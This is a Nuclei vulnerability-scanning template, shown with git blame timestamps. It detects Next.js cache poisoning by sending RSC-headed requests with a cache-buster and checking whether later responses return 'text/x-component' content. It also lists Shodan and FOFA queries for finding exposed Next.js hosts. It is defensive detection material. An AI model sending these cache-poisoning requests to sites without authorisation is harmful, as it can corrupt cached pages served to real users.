nuclei-templates/http/vulnerabilities/nextjs/nextjs-rsc-cache.yaml

51 lines
1.1 KiB
YAML
Raw Normal View History

2024-07-10 10:25:48 +00:00
id: nextjs-rsc-cache
info:
2024-07-10 18:09:17 +00:00
name: Next.js - Cache Poisoning
2024-07-10 10:25:48 +00:00
author: DhiyaneshDk
severity: high
2024-07-10 18:12:57 +00:00
description: |
Next.js is vulnerable to Cache Poisoning using RSC.
2024-07-10 10:25:48 +00:00
reference:
- https://zhero-web-sec.github.io/research-and-things/nextjs-and-cache-poisoning-a-quest-for-the-black-hole
metadata:
verified: true
vendor: vercel
product: next.js
framework: node.js
shodan-query:
- http.html:"/_next/static"
- cpe:"cpe:2.3:a:zeit:next.js"
fofa-query: body="/_next/static"
2024-07-10 18:09:17 +00:00
tags: nextjs,cache
2024-07-10 10:25:48 +00:00
variables:
rand: "{{rand_text_numeric(5)}}"
http:
- raw:
- |
GET /?cb={{rand}} HTTP/1.1
Host: {{Hostname}}
Priority: u=1
Rsc: 1
2024-07-10 10:30:05 +00:00
2024-07-10 10:25:48 +00:00
- |
2024-07-10 18:09:17 +00:00
@timeout: 10s
2024-07-10 10:25:48 +00:00
GET /?cb={{rand}} HTTP/1.1
Host: {{Hostname}}
Priority: u=1
Rsc: 1
- |
2024-07-10 18:09:17 +00:00
@timeout: 10s
2024-07-10 10:25:48 +00:00
GET /?cb={{rand}} HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- "status_code_2 == 200 && contains(content_type_2, 'text/x-component')"
- "status_code_3 == 200 && contains(content_type_3, 'text/x-component')"
condition: and